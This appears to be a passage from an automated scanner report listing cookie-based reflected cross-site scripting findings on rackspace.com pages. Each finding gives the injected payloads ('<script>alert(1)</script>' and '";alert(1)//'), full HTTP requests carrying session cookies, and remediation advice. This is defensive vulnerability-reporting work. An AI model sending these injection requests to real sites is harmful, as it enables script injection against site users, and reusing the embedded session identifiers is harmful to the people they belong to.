GET /managed_hosting/websites/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f892429"%3balert(1)//66d51c896f4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fec3"><script>alert(1)</script>1fde6b80a30 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/websites/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f83fec3"><script>alert(1)</script>1fde6b80a30; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44874"><script>alert(1)</script>2d126371dd was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/websites/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D44874"><script>alert(1)</script>2d126371dd; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64797"%3balert(1)//836df8d1912 was submitted in the chatslider cookie. This input was echoed as 64797";alert(1)//836df8d1912 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/websites/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D64797"%3balert(1)//836df8d1912; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8034b"%3balert(1)//36ce831ddf was submitted in the IS_UASrackuid cookie. This input was echoed as 8034b";alert(1)//36ce831ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /min/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d8034b"%3balert(1)//36ce831ddf; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab44"><script>alert(1)</script>0b341920e1c was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /min/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d1ab44"><script>alert(1)</script>0b341920e1c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79ce"><script>alert(1)</script>e9c12265e48 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /min/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Ac79ce"><script>alert(1)</script>e9c12265e48; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1016e"%3balert(1)//e5e5d063a82 was submitted in the chatslider cookie. This input was echoed as 1016e";alert(1)//e5e5d063a82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /min/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A1016e"%3balert(1)//e5e5d063a82; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a731"><script>alert(1)</script>4dc46251c86 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /openstack/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f86a731"><script>alert(1)</script>4dc46251c86; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53159"%3balert(1)//0e89712aaff was submitted in the IS_UASrackuid cookie. This input was echoed as 53159";alert(1)//0e89712aaff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /openstack/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f853159"%3balert(1)//0e89712aaff; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:46:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 47089
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfa1"><script>alert(1)</script>9f170bbe10 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /openstack/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1dfa1"><script>alert(1)</script>9f170bbe10; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f770"%3balert(1)//63b04d4a517 was submitted in the chatslider cookie. This input was echoed as 4f770";alert(1)//63b04d4a517 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /openstack/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4f770"%3balert(1)//63b04d4a517; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db951"><script>alert(1)</script>052686cbf was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /partners/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8db951"><script>alert(1)</script>052686cbf; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6970c"%3balert(1)//95c551d7ddc was submitted in the IS_UASrackuid cookie. This input was echoed as 6970c";alert(1)//95c551d7ddc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
